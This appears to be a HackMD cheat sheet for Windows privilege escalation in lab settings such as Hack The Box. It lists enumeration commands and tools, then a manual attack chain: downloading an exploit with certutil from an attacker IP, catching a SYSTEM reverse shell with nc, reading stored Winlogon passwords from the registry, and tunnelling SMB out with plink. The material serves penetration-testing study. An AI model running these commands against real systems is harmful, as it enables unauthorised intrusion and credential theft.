Try   HackMD

Windows Privilege Escalation

tags: windows priv esc

Fuzzy Security reference
Windows Priv Esc Guide -abs
Priv Esc Windows Guide -sushant
Payload all the things

# to get system info use:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# to check patching levels use:
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn

# to list drives use:
wmic logicaldisk get caption,description,providername

# show current user
whoami

# show current privileges
whoami /priv 

# show groups for current user
whoami /groups 

# show users on the machine
net user 

# show info for user x
net user x

# show info for group x
net localgroup x

# show arp table
arp -a

# show routing table
route print

# network statistics
netstat -ano

# see defender status (sc is service control)
sc query windefend

# see all services running
sc queryex type= service

# see state of fw through either of these two commands
netsh firewall show state
netsh advfirewall firewall dump

# see config
netsh firewall show config

Automated Tools Overview

WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Sherlock - https://github.com/rasta-mouse/Sherlock

Watson - https://github.com/rasta-mouse/Watson

PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

JAWS - https://github.com/411Hall/JAWS

Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

Seatbelt - https://github.com/GhostPack/Seatbelt

SharpUp - https://github.com/GhostPack/SharpUp

To install pip incase you don't have it
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

Manual Exploitation

We can compile the exploit then set up a web server with python for the victim machine to reach out to and download the file.









# set up the server
python -m SimpleHTTPServer 80 #or
python3 -m HTTP.server

# navigate to the webserver and download the file
certutil -urlcache -f http://ip/filename localName 
e.g certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe

We then set up a listener for the victim to connect back to:








# setup a listener on the attacker machine
nc -nlvp 5555

# run the exploit on the victim
ms.exe ip port e.g ms.exe 10.10.14.4 5555

# pops a shell as NT AUTHORITY\SYSTEM

MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Password abuse
















# once we have a shell we can run the command below to look for default passwords stored in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# for machines where a port is only available internally, we can forward that port if we have a low level shell

# we can forward the traffic using plink.exe which can be downloaded from the putty download page

# before using plink, lets edit the ssh_config to allow root login by changing the PermitRootLogin to true under /etc/ssh/sshd_config

# the command syntax is
# plink.exe -l SuperUser -pw Passwd -R internalPort:localhost:ExternalPort External ip
plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4

# we can pop an admin shell with the command below over the previously forwaded port
winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe"

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Stabilizing a shell

TTy shell escape

Last changed by 
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
452

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Active - HTB Series

image

Aug 10, 2024
Metasploit 101

MSF architecture Modules Exploit: contains the exploit code Payload: contains the shell code used after exploit compromises a system Encoder: allows us to modify the appearance of our exploit in order to avoid signature detection NOP: used with buffer overflow and ROP attacks. A NOP generator produces a series of random bytes that can be used to bypass standard IDS and IPS NOP sled signatures. Auxiliary: performs arbitrary actions not directly related to exploitation e.g Scanning, fuzzing, and DOS attacks. Usually used to scan and verify that machines are exploitable. Post: used for looting and pivoting.

Aug 8, 2024
Read more from codeAssassin
Published on HackMD